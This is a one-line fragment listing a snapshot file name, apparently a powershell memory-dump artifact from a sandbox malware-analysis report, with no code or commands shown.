• Snapshot File: hcaresult_2_2_7ffc94bc0000_powershell.jbxd